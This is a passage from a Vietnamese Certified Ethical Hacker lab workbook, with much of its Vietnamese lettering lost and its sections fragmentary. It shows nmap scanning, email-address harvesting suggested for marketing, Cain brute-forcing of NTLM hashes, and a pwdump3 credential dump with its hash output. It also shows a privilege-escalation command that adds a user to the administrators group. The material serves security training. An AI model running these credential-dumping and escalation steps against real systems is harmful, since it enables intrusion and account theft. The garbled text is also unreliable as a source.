Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 1
Mc Lc

Bài 1: 3
FOOTPRINTING 3
I/ Gii thiu v Foot Print: 3
II/ Các bài thc hành: 3
Bài 1: Tìm thông tin v Domain 3
Bài 2: Tìm thông tin email 5
Bài 2: 7
SCANNING 7
I/ Gii thiu v Scanning: 7
II/ Các Bài thc hành 7
Bài thc hành 1: S dng Phn mm Nmap 7
Bài thc hành th 2: S dng phn mm Retina đ phát hin các vulnerabilities và tn
công bng Metaesploit framework 13
Bài 3: 18
SYSTEM HACKING 18
I/ Gii thiu System Hacking: 18
II/ Thc hành các bài Lab 18
Bài 1: Crack password nt b ni b 18
Bài 2: S dng chng trình pwdump3v2 khi có đc 1 user administrator ca
máy nn nhân đ có th tìm đc thông tin các user còn li 20
Bài Lab 3: Nâng quyn thông qua chng trình Kaspersky Lab 23
Bài Lab 4: S dng Keylogger 25
Bài Lab 5: S dng Rootkit và xóa Log file 27
Bài 4: 30
TROJAN và BACKDOOR 30
I/ Gii thiu v Trojan và Backdoor: 30
II/ Các bài thc hành: 30

I/ Gii thiu: 80
II/ Thc Hin bài lab 80
Bài Lab 1: Tn công Web Server Win 2003(li Apache) 80
Bài lab 2: Khai thác li ng dng Server U 84
Bài 10: 85
WEB APPLICATION HACKING 85
I/ Gii thiu: 85
II/ Các Bài Lab 85
Bài Lab 1: Cross Site Scripting 85
Bài Lab 2: Insufficient Data Validation 86
Bài Lab 3: Cookie Manipulation 88
Bài Lab 4: Authorization Failure 89
Bài 11: 91
SQL INJECTION 91
I/ Gii thiu v SQL Injection: 91
II/ Thc Hành Bài Lab 94
Bài 12: 101
WIRELESS HACKING 101
I/ Gii Thiu 101
II/ Thc hành bài Lab: 101
Bài 13: 105
VIRUS 105
I/ Gii thiu: (tham kho bài đc thêm) 105
II/ Thc hành Lab: 105
Bài 1: Virus phá hy d liu máy 105
Bài 2: Virus gaixinh lây qua tin nhn 107
Bài 14: 111
BUFFER OVERFLOW 111
I/ Lý thuyt 111
II/ Thc hành: 118

Bài 1: Tìm thông tin v Domain
Ta vào trang
www.whois.net
đ tìm kim thông tin và đánh vào domain mình mun
tìm kim thông tin
Sau đó ta nhn đc thông tin nh sau:
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 4
Registrar Name : BlueHost.Com
Registrar Whois : whois.bluehost.com
Registrar Homepage:

Domain Name: ITVIETNAM.COM

Created on : 1999-11-23 11:31:30 GMT
Expires on : 2009-11-23 00:00:00 GMT
Last modified on : 2007-07-30 03:15:11 GMT

Registrant Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax :
Email:

mình. Vào link sau đây đ s dng tin ích này.

Vic tìm kim đc thông tin này rt cn thit vi Hacker, bi vì da vào thông tin s
dng chung Server này, Hacker có th thông qua các Website b li trong danh sách trên và
tn công vào Server t đó kim soát tt c các Website đc hosting trên Server.

Bài 2: Tìm thông tin email
Trong bài thc hành này, chúng ta s dng phn mm “1
st
email address spider” đ
tìm kim thông tin v các email. Hacker có th s dng phn mm này đ thu thp thêm thông
tin v mail, hay lc ra các đi tng email khác nhau, tuy nhiên bn có th s dng tool này
đ thu thp thêm thông tin nhm mc đích marketing, ví d bn cn tìm thông tin ca các
email có đuôi là @vnn.vn hay @hcm.vnn.vn đ phc cho vic marketing sn phm.

Ta có th cu hình vic s dng trang web nào đ ly thông tin, trong bài tôi s dng
trang google.com đ tìm kim.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 6 Sau đó đánh t khóa vnn.vn vào tag keyword
Sau đó chúng ta đã có đc 1 list mail nh s dng trng trình này.
Giáo trình bài tp C|EH Tài liu dành cho hc viên

các host này m, ta s dng lnh Nmap –h đ xem li các option ca Nmap, sau đó thc hin
lnh “Nmap –sS 10.100.100.1-20”. Và sau đó đc kt qu sau:

C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20

Starting Nmap 4.20 ( ) at 2007-08-02 10:27 Pacific Standard
Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)

Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT STATE SERVICE
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 8
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
23/tcp open telnet
42/tcp open nameserver
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn

Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 9
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)

Interesting ports on 10.100.100.20:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1000/tcp open cadlock
5101/tcp open admdog
MAC Address: 00:15:C5:65:E3:85 (Dell)

Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds

Trong mng có tt c 7 host, 6 máy Vmware và 1 PC DELL. Bây gi bc tip theo ta
tìm kim thông tin v OS ca các Host trên bng s dng lnh “ Nmap –v -O ip address” .

C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tit Nmap quét)

OS Fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C
29%TM=46B2187
OS:3%P=i686-pc-windows-
windows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0)
OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0
0%O4=M5B4NW0NNT0
OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F
AF0%W3=FAF0%W4=F
OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN
S%CC=N%Q=)T1(R=Y
OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=
Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT
00NNS%RD=0%Q=)T4
OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T
=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=
0%Q=)T7(R=Y%DF=N%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0
%IPL=B0%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T
OSI=Z%CD=Z%SI=S%
OS:DLI=S)

Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental

Giáo trình bài tp C|EH Tài liu dành cho hc viên

Nmap finished: 1 IP address (1 host up) scanned in 2.781 seconds

Tuy nhiên có 1 s host Nmap không th nhn din ra nh sau:

C:\Documents and Settings\anhhao>nmap -O 10.100.100.16

Starting Nmap 4.20 ( ) at 2007-08-02 10:55 Pacific Standard
Time
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://i
nsecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=21%CT=1%CU=35147%PV=Y%DS=1%G=Y%M=000C2
9%TM=46B21A94
OS:%P=i686-pc-windows-
windows)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%II=I%SS=S%TS=0)S
OS:EQ(SP=FD%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=0)OPS(O1=M5B4NW0NNT0
0NNS%O2=M5B
OS:4NW0NNT00NNS%O3=M5B4NW0NNT00%O4=M5B4NW0NNT00NNS%O5=M5B4

C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16

Starting Nmap 4.20 ( ) at 2007-08-02 11:01 Pacific Standard
Time
Interesting ports on 10.100.100.16:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
MAC Address: 00:0C:29:D6:73:6D (VMware)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://insec
ure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds

Vy ta có th đoán đc phn nhiu host là Window 2000 Server. Ngoài vic thc
hành trên chúng ta có th s dng Nmap trace, lu log v.v

Bài thc hành th 2: S dng phn mm Retina đ phát hi
n các vulnerabilities và tn công
bng Metaesploit framework.
Retina ca Ieye là phn mm thng mi(cng nh GFI, shadow v.v ) có th update
các l hng 1 cách thng xuyên và giúp cho ngi Admin h thng có th đa ra nhng gii
pháp đ x lý.
Bây gi ta s dng phn mm Retina đ dò tìm li ca máy Win 2003
Sp0(10.100.100.6)
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 14

14. ApacheBench multiple buffer overflows 1
15. HTTP TRACE method supported 1
Rank Port Number Description Count
1. TCP:7 ECHO - Echo 1
2. TCP:9 DISCARD - Discard 1
3. TCP:13 DAYTIME - Daytime 1
4. TCP:17 QOTD - Quote of the Day 1
5. TCP:19 CHARGEN - Character Generator 1
6. TCP:23 TELNET - Telnet 1
7. TCP:42 NAMESERVER / WINS - Host Name Server 1
8. TCP:53 DOMAIN - Domain Name Server 1
9. TCP:80
WWW-HTTP - World Wide Web HTTP (Hyper Text
Transfer Protocol)
1
10. TCP:135
RPC-LOCATOR - RPC (Remote Procedure Call) Location
Service
1
11. TCP:139 NETBIOS-SSN - NETBIOS Session Service 1
12. TCP:445 MICROSOFT-DS - Microsoft-DS 1
13. TCP:1025 LISTEN - listen 1
14. TCP:1026 NTERM - nterm 1
15. TCP:1030 IAD1 - BBN IAD 1
16. TCP:2103 ZEPHYR-CLT - Zephyr Serv-HM Conncetion 1
17. TCP:2105 EKLOGIN - Kerberos (v4) Encrypted RLogin 1
18. TCP:3389 MS RDP (Remote Desktop Protocol) / Terminal Services 1
19. TCP:8080 Generic - Shared service port 1
20. UDP:7 ECHO - Echo 1
Giáo trình bài tp C|EH Tài liu dành cho hc viên

Kt lun: Phn mm scanning rt quan trng vi Hacker đ có th phát hin li ca h thng,
sau khi xác đnh li Hacker có th s dng Framework có sn hay code có sn trên Internet đ
có th chim quyn s dng ca máy mc tiêu. Tuy nhiên đây cng là công c hu ích ca
Admin h thng, phn mm này giúp cho ngi Admin h thng đánh giá li mc đ bo mt
ca h thng mình và kim tra liên tc các bug li xy ra.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 18

Bài 3:

SYSTEM HACKING
I/ Gii thiu System Hacking:
Nh chúng ta đã hc  phn lý thuyt, Module System Hacking bao gm nhng k
thut ly Username và Password, nâng quyn trong h thng, s dng keyloger đ ly thông
tin ca đi phng(trong bc này cng có th Hacker đ li Trojan, vn đ hc  chng


Bt phm mm Cain và chn Import Hashes from local system
 đây chúng ta thy có 3 ch đ, “ Import hash from local system”, ta s dng file
SAM ca h thng hin ti đ ly hash ca account(không có mã hóa syskey), Option Import
Hashes from text file, thông thng text file này là ly t Pwdump(lu hash ca account h
thng di dng không b mã hóa), Option th 3 là khi chúng ta có syskey và file SAM b mã
hóa bi syskey. Ca ba trng hp nu nhp đy đ thông tin chúng ta đu có th có hash ca
account không b mã hóa bi syskey. Da vào thông tin hash này phn mm s brute force đ
tìm kim password ca account.
Trong bài ta chn user haovsic, và chn Brute force theo NTLM hash. Sau khi chn
ch đ này ta thy PC bt đu tính toán và cho ra kt qu.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 20

Bài 2: S dng chng trình pwdump3v2 khi có đc 1 user administrator ca
máy nn nhân đ có th tìm đc thông tin các user còn li.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 21
Máy ca nn nhân s dng Window 2003 sp0, và có sn user “quyen” password là
“cisco”, bây gi da vào account này, ta có th tìm thêm thông tin ca nhng account khác
trong máy.
Trc tiên ta s dng pwdump3.exe đ xem các tham s cn nhp vào. Sau đó s
dng lnh “pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen”, và nhp vào password ca
user quyen.

IUSR_113-
SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483
3ABFA52ADA9462:::
IWAM_113-
SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16
D60F8B64F7AE1FA:::
lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9
D738EE:::
quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E
7331E9A2:::
SUPPORT_388945a0:1001:NO
PASSWORD*********************:F791B19C488F4260723561D4F484EA09:::
tam:1014:NO PASSWORD*********************:NO
PASSWORD*********************:::
test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B8
9537:::
vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB
12283678:::
Ta thy thông tin user quyen có ID là 500, đây là ID ca user administrator trong
mng, và user Guest là 501. Ngoài thông tin trên, ta có thêm thông tin v pash hash ca user,
bây gi ta s dng chng trình Cain đ tìm kim thông tin v password ca các user khác.

S dng Brute Force Attack vi user “hiclassceh” và tìm ra password là “1234a”.
Password này ch có 5 ký t và d dàng b Brute Force, tuy nhiên đi vi nhng password là “
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 23
stong password” (password bao gm ch hoa và thng, ký t, s, ký t đc bit) thì s lâu

net Localgroup administrators hao /add
The command completed successfully. D:\WINDOWS\system32>net user hao
net user hao
User name hao
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 8/3/2007 1:47 PM
Password expires 9/15/2007 12:35 PM
Password changeable 8/3/2007 1:47 PM
Password required Yes
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 25
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/3/2007 1:54 PM

Logon hours allowed All